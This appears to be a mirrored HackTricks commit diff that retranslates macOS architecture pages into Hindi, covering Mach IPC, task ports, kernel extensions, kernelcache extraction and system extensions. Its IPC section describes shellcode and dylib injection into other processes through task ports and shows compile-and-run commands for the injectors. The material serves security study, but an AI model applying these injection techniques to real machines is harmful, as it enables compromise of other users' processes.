maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/macos-hardening/macos-security-and-privilege-escalation

Browse Source
This commit is contained in:
Translator 2025-01-03 06:18:14 +00:00
parent 712c9c62ef
commit ab24f24d7b
249 changed files with 2382 additions and 2472 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
View File

@ -12,7 +12,7 @@ XNU का ओपन-सोर्स संस्करण: [https://opensource.
### Mach
Mach एक **माइक्रोकर्नेल** है जिसे **UNIX-संगत** होने के लिए डिज़ाइन किया गया है। इसके प्रमुख डिज़ाइन सिद्धांतों में से एक था **कर्नेल** स्थान में चलने वाले **कोड** की मात्रा को **कम करना** और इसके बजाय कई सामान्य कर्नेल कार्यों, जैसे फ़ाइल प्रणाली, नेटवर्किंग, और I/O, को **उपयोगकर्ता-स्तरीय कार्यों के रूप में चलाने** की अनुमति देना।
Mach एक **माइक्रोकर्नेल** है जिसे **UNIX-संगत** होने के लिए डिज़ाइन किया गया है। इसके प्रमुख डिज़ाइन सिद्धांतों में से एक था **कर्नेल** स्थान में चलने वाले **कोड** की मात्रा को **कम करना** और इसके बजाय कई सामान्य कर्नेल कार्यों, जैसे फ़ाइल प्रणाली, नेटवर्किंग, और I/O को **उपयोगकर्ता-स्तरीय कार्यों के रूप में चलाने** की अनुमति देना।
XNU में, Mach **कर्नेल द्वारा सामान्यतः संभाले जाने वाले कई महत्वपूर्ण निम्न-स्तरीय संचालन** के लिए **जिम्मेदार** है, जैसे प्रोसेसर शेड्यूलिंग, मल्टीटास्किंग, और वर्चुअल मेमोरी प्रबंधन।
@ -27,7 +27,7 @@ XNU **कर्नेल** में **FreeBSD** प्रोजेक्ट स
- TCP/IP स्टैक और सॉकेट
- फ़ायरवॉल और पैकेट फ़िल्टरिंग
BSD और Mach के बीच बातचीत को समझना जटिल हो सकता है, उनके विभिन्न वैचारिक ढांचे के कारण। उदाहरण के लिए, BSD प्रक्रियाओं का उपयोग अपने मौलिक निष्पादन इकाई के रूप में करता है, जबकि Mach थ्रेड के आधार पर कार्य करता है। इस विसंगति को XNU में **प्रत्येक BSD प्रक्रिया को एक Mach कार्य से जोड़कर** सुलझाया गया है जिसमें ठीक एक Mach थ्रेड होता है। जब BSD का fork() सिस्टम कॉल उपयोग किया जाता है, तो कर्नेल के भीतर BSD कोड एक कार्य और थ्रेड संरचना बनाने के लिए Mach कार्यों का उपयोग करता है।
BSD और Mach के बीच बातचीत को समझना जटिल हो सकता है, उनके विभिन्न वैचारिक ढांचे के कारण। उदाहरण के लिए, BSD प्रक्रियाओं का उपयोग अपने मौलिक निष्पादन इकाई के रूप में करता है, जबकि Mach थ्रेड के आधार पर कार्य करता है। इस विसंगति को XNU में **प्रत्येक BSD प्रक्रिया को एक Mach कार्य के साथ जोड़कर** सुलझाया गया है जिसमें ठीक एक Mach थ्रेड होता है। जब BSD का fork() सिस्टम कॉल उपयोग किया जाता है, तो कर्नेल के भीतर BSD कोड एक कार्य और एक थ्रेड संरचना बनाने के लिए Mach कार्यों का उपयोग करता है।
इसके अलावा, **Mach और BSD प्रत्येक अलग-अलग सुरक्षा मॉडल बनाए रखते हैं**: **Mach का** सुरक्षा मॉडल **पोर्ट अधिकारों** पर आधारित है, जबकि BSD का सुरक्षा मॉडल **प्रक्रिया स्वामित्व** के आधार पर कार्य करता है। इन दोनों मॉडलों के बीच के भिन्नताएँ कभी-कभी स्थानीय विशेषाधिकार-उन्नयन कमजोरियों का परिणाम बनती हैं। सामान्य सिस्टम कॉल के अलावा, **Mach ट्रैप भी हैं जो उपयोगकर्ता-स्थान कार्यक्रमों को कर्नेल के साथ बातचीत करने की अनुमति देते हैं**। ये विभिन्न तत्व मिलकर macOS कर्नेल की बहुपरकारी, हाइब्रिड आर्किटेक्चर का निर्माण करते हैं।
@ -49,7 +49,7 @@ macos-iokit.md
macOS **कर्नेल एक्सटेंशन** (.kext) लोड करने के लिए **अत्यधिक प्रतिबंधात्मक** है क्योंकि कोड उच्च विशेषाधिकार के साथ चलेगा। वास्तव में, डिफ़ॉल्ट रूप से यह लगभग असंभव है (जब तक कि कोई बायपास नहीं पाया जाता)।
अगली पृष्ठ पर आप यह भी देख सकते हैं कि macOS अपने **कर्नेलकैश** के भीतर लोड किए गए `.kext` को कैसे पुनर्प्राप्त किया जाए:
अगली पृष्ठ पर आप यह भी देख सकते हैं कि macOS अपने **कर्नेलकैश** के भीतर `.kext` को कैसे पुनर्प्राप्त करता है:
{{#ref}}
macos-kernel-extensions.md

36
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View File

@ -2,15 +2,15 @@
{{#include ../../../../banners/hacktricks-training.md}}
## मच संदेश भेजना पोर्ट के माध्यम से
## मच संदेश भेजना पोर्ट्स के माध्यम से
### बुनियादी जानकारी
मच **कार्य** को संसाधनों को साझा करने के लिए **सबसे छोटे इकाई** के रूप में उपयोग करता है, और प्रत्येक कार्य में **कई थ्रेड** हो सकते हैं। ये **कार्य और थ्रेड POSIX प्रक्रियाओं और थ्रेड्स के लिए 1:1 मैप किए जाते हैं**
कार्य के बीच संचार मच इंटर-प्रोसेस संचार (IPC) के माध्यम से होता है, जो एकतरफा संचार चैनलों का उपयोग करता है। **संदेश पोर्ट के बीच स्थानांतरित होते हैं**, जो **कर्नेल द्वारा प्रबंधित संदेश कतारों** के रूप में कार्य करते हैं।
कार्य के बीच संचार मच इंटर-प्रोसेस संचार (IPC) के माध्यम से होता है, जो एकतरफा संचार चैनलों का उपयोग करता है। **संदेश पोर्ट्स के बीच स्थानांतरित होते हैं**, जो **कर्नेल द्वारा प्रबंधित संदेश कतारों** के रूप में कार्य करते हैं।
प्रत्येक प्रक्रिया में एक **IPC तालिका** होती है, जिसमें प्रक्रिया के **मच पोर्ट** पाए जा सकते हैं। एक मच पोर्ट का नाम वास्तव में एक संख्या है (कर्नेल ऑब्जेक्ट के लिए एक पॉइंटर)।
प्रत्येक प्रक्रिया में एक **IPC तालिका** होती है, जिसमें प्रक्रिया के **मच पोर्ट्स** को खोजना संभव है। एक मच पोर्ट का नाम वास्तव में एक संख्या है (कर्नेल ऑब्जेक्ट के लिए एक पॉइंटर)।
एक प्रक्रिया किसी अन्य कार्य को कुछ अधिकारों के साथ एक पोर्ट नाम भी भेज सकती है और कर्नेल इस प्रविष्टि को **दूसरे कार्य की IPC तालिका** में प्रदर्शित करेगा।
@ -18,19 +18,19 @@
पोर्ट अधिकार, जो यह परिभाषित करते हैं कि एक कार्य कौन से संचालन कर सकता है, इस संचार के लिए कुंजी हैं। संभावित **पोर्ट अधिकार** हैं ([यहां से परिभाषाएँ](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
- **प्राप्ति अधिकार**, जो पोर्ट पर भेजे गए संदेशों को प्राप्त करने की अनुमति देता है। मच पोर्ट MPSC (कई उत्पादक, एक उपभोक्ता) कतारें हैं, जिसका अर्थ है कि पूरे सिस्टम में **प्रत्येक पोर्ट के लिए केवल एक प्राप्ति अधिकार** हो सकता है (पाइप के विपरीत, जहां कई प्रक्रियाएं एक पाइप के पढ़ने के अंत के लिए फ़ाइल वर्णनकर्ता रख सकती हैं)।
- **प्राप्ति** अधिकार वाला एक कार्य संदेश प्राप्त कर सकता है और **भेजने के अधिकार** बना सकता है, जिससे यह संदेश भेजने में सक्षम हो जाता है। मूल रूप से केवल **स्वयं का कार्य अपने पोर्ट पर प्राप्ति अधिकार रखता है**
- **प्राप्ति अधिकार**, जो पोर्ट पर भेजे गए संदेशों को प्राप्त करने की अनुमति देता है। मच पोर्ट्स MPSC (कई उत्पादक, एक उपभोक्ता) कतारें हैं, जिसका अर्थ है कि पूरे सिस्टम में **प्रत्येक पोर्ट के लिए केवल एक प्राप्ति अधिकार** हो सकता है (पाइप के विपरीत, जहां कई प्रक्रियाएं एक पाइप के पढ़ने के अंत के लिए फ़ाइल वर्णनकर्ता रख सकती हैं)।
- **प्राप्ति** अधिकार वाला एक कार्य संदेश प्राप्त कर सकता है और **भेजने के अधिकार** बना सकता है, जिससे इसे संदेश भेजने की अनुमति मिलती है। मूल रूप से केवल **स्वयं का कार्य अपने पोर्ट पर प्राप्ति अधिकार रखता है**
- **भेजने का अधिकार**, जो पोर्ट पर संदेश भेजने की अनुमति देता है।
- भेजने का अधिकार **क्लोन** किया जा सकता है ताकि एक कार्य जो भेजने का अधिकार रखता है, अधिकार को क्लोन कर सके और **इसे तीसरे कार्य को सौंप सके**
- **एक बार भेजने का अधिकार**, जो पोर्ट पर एक संदेश भेजने की अनुमति देता है और फिर गायब हो जाता है।
- **पोर्ट सेट अधिकार**, जो एक _पोर्ट सेट_ को दर्शाता है न कि एकल पोर्ट। एक पोर्ट सेट से संदेश को डीक्यू करने का अर्थ है कि यह उस पोर्ट में से एक संदेश को डीक्यू करता है जो इसे शामिल करता है। पोर्ट सेट का उपयोग एक साथ कई पोर्ट पर सुनने के लिए किया जा सकता है, जैसे कि Unix में `select`/`poll`/`epoll`/`kqueue`
- **मृत नाम**, जो वास्तव में एक पोर्ट अधिकार नहीं है, बल्कि केवल एक प्लेसहोल्डर है। जब एक पोर्ट नष्ट होता है, तो पोर्ट के लिए सभी मौजूदा पोर्ट अधिकार मृत नामों में बदल जाते हैं।
- **पोर्ट सेट अधिकार**, जो एक _पोर्ट सेट_ को दर्शाता है न कि एकल पोर्ट। एक पोर्ट सेट से संदेश को डीक्यू करने का अर्थ है कि यह उस पोर्ट में से एक संदेश को डीक्यू करता है जिसे यह शामिल करता है। पोर्ट सेट का उपयोग एक साथ कई पोर्ट पर सुनने के लिए किया जा सकता है, जैसे कि Unix में `select`/`poll`/`epoll`/`kqueue`
- **मृत नाम**, जो वास्तव में एक वास्तविक पोर्ट अधिकार नहीं है, बल्कि केवल एक प्लेसहोल्डर है। जब एक पोर्ट नष्ट होता है, तो पोर्ट के लिए सभी मौजूदा पोर्ट अधिकार मृत नामों में बदल जाते हैं।
**कार्य SEND अधिकारों को दूसरों को स्थानांतरित कर सकते हैं**, जिससे उन्हें संदेश वापस भेजने की अनुमति मिलती है। **SEND अधिकारों को भी क्लोन किया जा सकता है, इसलिए एक कार्य डुप्लिकेट कर सकता है और तीसरे कार्य को अधिकार दे सकता है**। यह, एक मध्यवर्ती प्रक्रिया के साथ मिलकर जिसे **बूटस्ट्रैप सर्वर**ा जाता है, कार्यों के बीच प्रभावी संचार की अनुमति देता है।
**कार्य SEND अधिकारों को दूसरों को स्थानांतरित कर सकते हैं**, जिससे उन्हें संदेश वापस भेजने की अनुमति मिलती है। **SEND अधिकारों को भी क्लोन किया जा सकता है, ताकि एक कार्य डुप्लिकेट कर सके और तीसरे कार्य को अधिकार दे सके**। यह, एक मध्यवर्ती प्रक्रिया के साथ मिलकर जिसे **बूटस्ट्रैप सर्वर**े रूप में जाना जाता है, कार्यों के बीच प्रभावी संचार की अनुमति देता है।
### फ़ाइल पोर्ट
### फ़ाइल पोर्ट्स
फ़ाइल पोर्ट मैक पोर्ट्स में फ़ाइल वर्णनकर्ताओं को संलग्न करने की अनुमति देते हैं (मच पोर्ट अधिकारों का उपयोग करते हुए)। एक दिए गए FD से `fileport_makeport` का उपयोग करके एक `fileport` बनाना संभव है और एक fileport से FD बनाने के लिए `fileport_makefd` का उपयोग करना संभव है।
फ़ाइल पोर्ट्स मैक पोर्ट्स में फ़ाइल वर्णनकर्ताओं को संलग्न करने की अनुमति देते हैं (मच पोर्ट अधिकारों का उपयोग करते हुए)। एक दिए गए FD से `fileport_makeport` का उपयोग करके एक `fileport` बनाना संभव है और एक fileport से FD बनाने के लिए `fileport_makefd` का उपयोग करना संभव है।
### संचार स्थापित करना
@ -55,9 +55,9 @@
- **launchd** जांचता है कि कार्य चल रहा है और यदि नहीं है, तो **इसे शुरू करता है**
- कार्य **A** (सेवा) एक **बूटस्ट्रैप चेक-इन** करता है। यहां, **बूटस्ट्रैप** सर्वर एक SEND अधिकार बनाता है, इसे रखता है, और **प्राप्ति अधिकार कार्य A को स्थानांतरित करता है**
- launchd **SEND अधिकार को डुप्लिकेट करता है और इसे कार्य B को भेजता है**
- कार्य **B** एक नए पोर्ट के साथ एक **प्राप्ति** अधिकार और एक **भेजने** का अधिकार उत्पन्न करता है, और **भेजने का अधिकार कार्य A (सेवा) को देता है** ताकि वह कार्य B को संदेश भेज सके (द्विदिशीय संचार)।
- कार्य **B** एक नए पोर्ट के साथ एक **प्राप्ति** अधिकार और एक **भेजने** का अधिकार उत्पन्न करता है, और **भेजने का अधिकार कार्य A** (सेवा) को देता है ताकि वह कार्य B को संदेश भेज सके (द्विदिशीय संचार)।
हालांकि, यह प्रक्रिया केवल पूर्वनिर्धारित सिस्टम कार्यों पर लागू होती है। गैर-प्रणाली कार्य अभी भी मूल रूप से वर्णित तरीके से कार्य करते हैं, जो संभावित रूप से अनुकरण की अनुमति दे सकता है।
हालांकि, यह प्रक्रिया केवल पूर्वनिर्धारित सिस्टम कार्यों पर लागू होती है। गैर-सिस्टम कार्य अभी भी मूल रूप से वर्णित तरीके से कार्य करते हैं, जो संभावित रूप से अनुकरण की अनुमति दे सकता है।
### एक मच संदेश
@ -84,7 +84,7 @@ mach_msg_id_t msgh_id;
संदेश हेडर के अन्य क्षेत्र हैं:
- `msgh_size`: पूरे पैकेट का आकार।
- `msgh_remote_port`: वह पोर्ट जिस पर यह संदेश भेजा जाता है।
- `msgh_remote_port`: वह पोर्ट जिस पर यह संदेश भेजा गया है।
- `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html)।
- `msgh_id`: इस संदेश की ID, जिसे रिसीवर द्वारा व्याख्यायित किया जाता है।
@ -230,11 +230,11 @@ printf("Sent a message\n");
- **होस्ट पोर्ट**: यदि किसी प्रक्रिया के पास इस पोर्ट पर **भेजने** का विशेषाधिकार है, तो वह **सिस्टम** के बारे में **जानकारी** प्राप्त कर सकता है (जैसे `host_processor_info`)।
- **होस्ट प्रिव पोर्ट**: इस पोर्ट पर **भेजने** का अधिकार रखने वाली प्रक्रिया **विशेषाधिकार प्राप्त क्रियाएँ** कर सकती है जैसे कि कर्नेल एक्सटेंशन लोड करना। इस अनुमति को प्राप्त करने के लिए **प्रक्रिया को रूट होना चाहिए**
- इसके अलावा, **`kext_request`** API को कॉल करने के लिए अन्य अधिकारों की आवश्यकता होती है **`com.apple.private.kext*`** जो केवल Apple बाइनरी को दिए जाते हैं।
- **कार्य नाम पोर्ट:** _कार्य पोर्ट_ का एक अप्रिवileged संस्करण। यह कार्य को संदर्भित करता है, लेकिन इसे नियंत्रित करने की अनुमति नहीं देता। इसके माध्यम से उपलब्ध एकमात्र चीज `task_info()` प्रतीत होती है।
- **कार्य नाम पोर्ट:** _कार्य पोर्ट_ का एक अप्रिविलेज्ड संस्करण। यह कार्य को संदर्भित करता है, लेकिन इसे नियंत्रित करने की अनुमति नहीं देता। इसके माध्यम से उपलब्ध एकमात्र चीज `task_info()` प्रतीत होती है।
- **कार्य पोर्ट** (जिसे कर्नेल पोर्ट भी कहा जाता है): इस पोर्ट पर भेजने की अनुमति के साथ कार्य को नियंत्रित करना संभव है (मेमोरी पढ़ना/लिखना, थ्रेड बनाना...)।
- कॉल करें `mach_task_self()` इस पोर्ट के लिए **नाम प्राप्त करने** के लिए कॉलर कार्य के लिए। यह पोर्ट केवल **`exec()`** के माध्यम से **विरासत में** मिलता है; `fork()` के साथ बनाए गए नए कार्य को एक नया कार्य पोर्ट मिलता है (एक विशेष मामले के रूप में, एक कार्य को `exec()` के बाद एक suid बाइनरी में भी एक नया कार्य पोर्ट मिलता है)। एक कार्य को उत्पन्न करने और इसके पोर्ट को प्राप्त करने का एकमात्र तरीका ["पोर्ट स्वैप डांस"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) करना है जबकि `fork()` कर रहे हैं।
- पोर्ट तक पहुँचने के लिए ये प्रतिबंध हैं (बाइनरी `AppleMobileFileIntegrity` से `macos_task_policy`):
- यदि ऐप के पास **`com.apple.security.get-task-allow` विशेषाधिकार** है, तो **समान उपयोगकर्ता की प्रक्रियाएँ कार्य पोर्ट तक पहुँच सकती हैं** (आमतौर पर डिबगिंग के लिए Xcode द्वारा जोड़ा जाता है)। **नोटरीकरण** प्रक्रिया इसे उत्पादन रिलीज़ में अनुमति नहीं देगी।
- यदि ऐप के पास **`com.apple.security.get-task-allow` विशेषाधिकार** है, तो **समान उपयोगकर्ता की प्रक्रियाएँ कार्य पोर्ट** तक पहुँच सकती हैं (आमतौर पर डिबगिंग के लिए Xcode द्वारा जोड़ा जाता है)। **नोटरीकरण** प्रक्रिया इसे उत्पादन रिलीज़ में अनुमति नहीं देगी।
- **`com.apple.system-task-ports`** विशेषाधिकार वाले ऐप्स किसी भी प्रक्रिया के लिए **कार्य पोर्ट प्राप्त कर सकते हैं**, सिवाय कर्नेल के। पुराने संस्करणों में इसे **`task_for_pid-allow`** कहा जाता था। यह केवल Apple अनुप्रयोगों को दिया जाता है।
- **रूट उन अनुप्रयोगों के कार्य पोर्ट तक पहुँच सकता है** जो **हर्डनड** रनटाइम के साथ संकलित नहीं हैं (और Apple से नहीं हैं)।
@ -498,11 +498,11 @@ return 0;
gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
./inject <pi or string>
```
### थ्रेड में टास्क पोर्ट के माध्यम से Dylib इंजेक्शन
### थ्रेड में टास्क पोर्ट के माध्यम से डायलिब इंजेक्शन
macOS में **थ्रेड्स** को **Mach** के माध्यम से या **posix `pthread` api** का उपयोग करके नियंत्रित किया जा सकता है। पिछले इंजेक्शन में जो थ्रेड हमने उत्पन्न किया, वह Mach api का उपयोग करके उत्पन्न किया गया था, इसलिए **यह posix अनुपालन नहीं है**
एक **सरल शेलकोड** को एक कमांड निष्पादित करने के लिए **इंजेक्ट करना संभव था** क्योंकि इसे **posix** अनुपालन वाले apis के साथ काम करने की आवश्यकता नहीं थी, केवल Mach के साथ। **अधिक जटिल इंजेक्शन** के लिए **थ्रेड** को भी **posix अनुपालन** होना चाहिए।
एक **सरल शेलकोड** को एक कमांड निष्पादित करने के लिए **इंजेक्ट** करना संभव था क्योंकि इसे **posix** अनुपालन वाले apis के साथ काम करने की आवश्यकता नहीं थी, केवल Mach के साथ। **अधिक जटिल इंजेक्शन** के लिए **थ्रेड** को भी **posix अनुपालन** होना चाहिए।
इसलिए, **थ्रेड को सुधारने** के लिए इसे **`pthread_create_from_mach_thread`** को कॉल करना चाहिए जो **एक मान्य pthread** बनाएगा। फिर, यह नया pthread **dlopen** को कॉल कर सकता है ताकि **सिस्टम से एक dylib** लोड किया जा सके, इसलिए विभिन्न क्रियाओं को करने के लिए नए शेलकोड लिखने के बजाय कस्टम लाइब्रेरीज़ लोड करना संभव है।
@ -802,7 +802,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
### बुनियादी जानकारी
XPC, जिसका अर्थ है XNU (macOS द्वारा उपयोग किया जाने वाला कर्नेल) इंटर-प्रोसेस कम्युनिकेशन, macOS और iOS पर **प्रक्रियाओं के बीच संचार** के लिए एक ढांचा है। XPC विभिन्न प्रक्रियाओं के बीच **सुरक्षित, असिंक्रोनस मेथड कॉल करने** के लिए एक तंत्र प्रदान करता है। यह एप्पल के सुरक्षा सिद्धांत का एक हिस्सा है, जो **विशेषाधिकार-सेपरेटेड एप्लिकेशन** के निर्माण की अनुमति देता है जहाँ प्रत्येक **घटक** केवल **उन अनुमतियों** के साथ चलता है जो इसे अपना काम करने के लिए आवश्यक हैं, इस प्रकार एक समझौता की गई प्रक्रिया से संभावित नुकसान को सीमित करता है।
XPC, जिसका अर्थ है XNU (macOS द्वारा उपयोग किया जाने वाला कर्नेल) इंटर-प्रोसेस कम्युनिकेशन, macOS और iOS पर **प्रक्रियाओं के बीच संचार** के लिए एक ढांचा है। XPC **सुरक्षित, असिंक्रोनस मेथड कॉल्स** करने के लिए एक तंत्र प्रदान करता है जो सिस्टम पर विभिन्न प्रक्रियाओं के बीच होता है। यह एप्पल के सुरक्षा सिद्धांत का एक हिस्सा है, जो **विशेषाधिकार-सेपरेटेड एप्लिकेशन्स** के निर्माण की अनुमति देता है जहाँ प्रत्येक **घटक** केवल **उन्हीं अनुमतियों** के साथ चलता है जिनकी उसे अपने कार्य को करने के लिए आवश्यकता होती है, इस प्रकार एक समझौता की गई प्रक्रिया से संभावित नुकसान को सीमित करता है।
इस **संचार के काम करने के तरीके** और यह **कैसे कमजोर हो सकता है** के बारे में अधिक जानकारी के लिए देखें:

22
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
View File

@ -4,19 +4,19 @@
## Basic Information
Kernel extensions (Kexts) **पैकेज** हैं जिनका **`.kext`** एक्सटेंशन होता है जो **macOS कर्नेल स्पेस में सीधे लोड** किए जाते हैं, मुख्य ऑपरेटिंग सिस्टम को अतिरिक्त कार्यक्षमता प्रदान करते हैं।
Kernel extensions (Kexts) **पैकेज** हैं जिनका **`.kext`** एक्सटेंशन होता है जो **सीधे macOS कर्नेल स्पेस में लोड** होते हैं, मुख्य ऑपरेटिंग सिस्टम को अतिरिक्त कार्यक्षमता प्रदान करते हैं।
### Requirements
स्पष्ट रूप से, यह इतना शक्तिशाली है कि **कर्नेल एक्सटेंशन लोड करना जटिल है**। ये **आवश्यकताएँ** हैं जो एक कर्नेल एक्सटेंशन को लोड करने के लिए पूरी करनी चाहिए:
स्पष्ट रूप से, यह इतना शक्तिशाली है कि **कर्नेल एक्सटेंशन लोड करना जटिल है**। ये हैं **आवश्यकताएँ** जो एक कर्नेल एक्सटेंशन को लोड करने के लिए पूरी करनी चाहिए:
- जब **रिकवरी मोड में प्रवेश करते हैं**, कर्नेल **एक्सटेंशन को लोड करने की अनुमति होनी चाहिए**:
<figure><img src="../../../images/image (327).png" alt=""><figcaption></figcaption></figure>
- कर्नेल एक्सटेंशन को **कर्नेल कोड साइनिंग सर्टिफिकेट** के साथ **साइन** किया जाना चाहिए, जो केवल **Apple द्वारा दिया जा सकता है**। जो कंपनी और इसकी आवश्यकता के कारणों की विस्तार से समीक्षा करेगा।
- कर्नेल एक्सटेंशन को **कर्नेल कोड साइनिंग सर्टिफिकेट** के साथ **साइन** किया जाना चाहिए, जिसे केवल **Apple** द्वारा **प्रदान** किया जा सकता है। जो कंपनी और इसके आवश्यक होने के कारणों की विस्तार से समीक्षा करेगा।
- कर्नेल एक्सटेंशन को **नोटराइज** भी किया जाना चाहिए, Apple इसे मैलवेयर के लिए जांच सकेगा।
- फिर, **रूट** उपयोगकर्ता ही **कर्नेल एक्सटेंशन को लोड** कर सकता है और पैकेज के अंदर की फ़ाइलें **रूट की होनी चाहिए**
- फिर, **रूट** उपयोगकर्ता ही **कर्नेल एक्सटेंशन को लोड** कर सकता है और पैकेज के अंदर की फ़ाइलें **रूट** की होनी चाहिए।
- अपलोड प्रक्रिया के दौरान, पैकेज को **संरक्षित नॉन-रूट स्थान** में तैयार किया जाना चाहिए: `/Library/StagedExtensions` (इसके लिए `com.apple.rootless.storage.KernelExtensionManagement` ग्रांट की आवश्यकता होती है)।
- अंत में, जब इसे लोड करने का प्रयास किया जाता है, तो उपयोगकर्ता [**एक पुष्टि अनुरोध प्राप्त करेगा**](https://developer.apple.com/library/archive/technotes/tn2459/_index.html) और, यदि स्वीकार किया गया, तो कंप्यूटर को इसे लोड करने के लिए **रीस्टार्ट** करना होगा।
@ -30,7 +30,7 @@ Kernel extensions (Kexts) **पैकेज** हैं जिनका **`.kext
- यह **`syspolicyd`** से **जांच** करेगा कि क्या एक्सटेंशन को **लोड** किया जा सकता है।
3. **`syspolicyd`** उपयोगकर्ता को **प्रॉम्प्ट** करेगा यदि एक्सटेंशन पहले लोड नहीं किया गया है।
- **`syspolicyd`** परिणाम को **`kextd`** को रिपोर्ट करेगा
4. अंततः **`kextd`** कर्नेल को एक्सटेंशन लोड करने के लिए **बताने** में सक्षम होगा
4. अंततः **`kextd`** कर्नेल को एक्सटेंशन को लोड करने के लिए **बताने** में सक्षम होगा
यदि **`kextd`** उपलब्ध नहीं है, तो **`kextutil`** वही जांच कर सकता है।
@ -58,7 +58,7 @@ iOS में यह **`/System/Library/Caches/com.apple.kernelcaches/kernelcach
#### IMG4
IMG4 फ़ाइल प्रारूप एक कंटेनर प्रारूप है जिसका उपयोग Apple अपने iOS और macOS उपकरणों में **फर्मवेयर** घटकों (जैसे **कर्नेलकैश**) को सुरक्षित रूप से **स्टोर और सत्यापित** करने के लिए करता है। IMG4 प्रारूप में एक हेडर और कई टैग शामिल होते हैं जो विभिन्न डेटा के टुकड़ों को संलग्न करते हैं, जिसमें वास्तविक पेलोड (जैसे कर्नेल या बूटलोडर), एक हस्ताक्षर, और एक सेट मैनिफेस्ट प्रॉपर्टीज शामिल हैं। यह प्रारूप क्रिप्टोग्राफिक सत्यापन का समर्थन करता है, जिससे डिवाइस फर्मवेयर घटक की प्रामाणिकता और अखंडता की पुष्टि कर सकता है इससे पहले कि इसे निष्पादित किया जाए
IMG4 फ़ाइल प्रारूप एक कंटेनर प्रारूप है जिसका उपयोग Apple अपने iOS और macOS उपकरणों में **फर्मवेयर** घटकों (जैसे **कर्नेलकैश**) को सुरक्षित रूप से **स्टोर और सत्यापित** करने के लिए करता है। IMG4 प्रारूप में एक हेडर और कई टैग होते हैं जो विभिन्न डेटा के टुकड़ों को संलग्न करते हैं, जिसमें वास्तविक पेलोड (जैसे कर्नेल या बूटलोडर), एक हस्ताक्षर, और एक सेट मैनिफेस्ट प्रॉपर्टीज शामिल हैं। यह प्रारूप क्रिप्टोग्राफिक सत्यापन का समर्थन करता है, जिससे डिवाइस फर्मवेयर घटक को निष्पादित करने से पहले उसकी प्रामाणिकता और अखंडता की पुष्टि कर सकता है।
यह आमतौर पर निम्नलिखित घटकों से बना होता है:
@ -69,7 +69,7 @@ IMG4 फ़ाइल प्रारूप एक कंटेनर प्र
- हस्ताक्षर शामिल है
- अतिरिक्त कुंजी/मान शब्दकोश
- **Restore Info (IM4R)**:
- जिसे APNonce के रूप में भी जाना जाता है
- APNonce के रूप में भी जाना जाता है
- कुछ अपडेट के पुनः खेलने से रोकता है
- वैकल्पिक: आमतौर पर यह नहीं पाया जाता
@ -93,9 +93,9 @@ nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l
```
- [**theapplewiki.com**](https://theapplewiki.com/wiki/Firmware/Mac/14.x)**,** [**ipsw.me**](https://ipsw.me/)**,** [**theiphonewiki.com**](https://www.theiphonewiki.com/)
कभी-कभी Apple **kernelcache** को **symbols** के साथ जारी करता है। आप उन पृष्ठों पर लिंक का पालन करके कुछ firmware को symbols के साथ डाउनलोड कर सकते हैं। firmware में अन्य फ़ाइलों के साथ **kernelcache** शामिल होगा।
कभी-कभी Apple **kernelcache** को **symbols** के साथ जारी करता है। आप उन पृष्ठों पर लिंक का पालन करके कुछ firmware डाउनलोड कर सकते हैं जिनमें symbols होते हैं इन firmware में अन्य फ़ाइलों के साथ **kernelcache** शामिल होगा।
फ़ाइलों को **extract** करने के लिए `.ipsw` से `.zip` में एक्सटेंशन बदलकर शुरू करें और **unzip** करें।
फ़ाइलों को **extract** करने के लिए, पहले `.ipsw` से `.zip` में एक्सटेंशन बदलें और फि**unzip** करें।
Firmware को extract करने के बाद आपको एक फ़ाइल मिलेगी जैसे: **`kernelcache.release.iphone14`**। यह **IMG4** प्रारूप में है, आप इसे दिलचस्प जानकारी निकालने के लिए उपयोग कर सकते हैं:
@ -107,9 +107,9 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon
```bash
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
```
### Inspecting kernelcache
### कर्नेलकैश का निरीक्षण करना
जांचें कि क्या kernelcache में प्रतीक हैं
जांचें कि क्या कर्नेलकैश में प्रतीक हैं
```bash
nm -a kernelcache.release.iphone14.e | wc -l
```

22
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
View File

@ -1,22 +1,22 @@
# macOS सिस्टम एक्सटेंशन
# macOS सिस्टम एक्सटेंशन्स
{{#include ../../../banners/hacktricks-training.md}}
## सिस्टम एक्सटेंशन / एंडपॉइंट सुरक्षा ढांचा
## सिस्टम एक्सटेंशन्स / एंडपॉइंट सुरक्षा ढांचा
Kernel Extensions के विपरीत, **सिस्टम एक्सटेंशन उपयोगकर्ता स्थान में चलत हैं** न कि कर्नेल स्थान में, जिससे एक्सटेंशन की खराबी के कारण सिस्टम क्रैश होने का जोखिम कम होता है।
Kernel Extensions के विपरीत, **सिस्टम एक्सटेंशन्स उपयोगकर्ता स्थान में चलत हैं** न कि कर्नेल स्थान में, जिससे एक्सटेंशन की खराबी के कारण सिस्टम क्रैश होने का जोखिम कम होता है।
<figure><img src="../../../images/image (606).png" alt="https://knight.sc/images/system-extension-internals-1.png"><figcaption></figcaption></figure>
सिस्टम एक्सटेंशन के तीन प्रकार हैं: **DriverKit** एक्सटेंशन, **Network** एक्सटेंशन, और **Endpoint Security** एक्सटेंशन।
सिस्टम एक्सटेंशन्स के तीन प्रकार हैं: **DriverKit** एक्सटेंशन्स, **Network** एक्सटेंशन्स, और **Endpoint Security** एक्सटेंशन्स
### **DriverKit एक्सटेंशन**
### **DriverKit एक्सटेंशन्स**
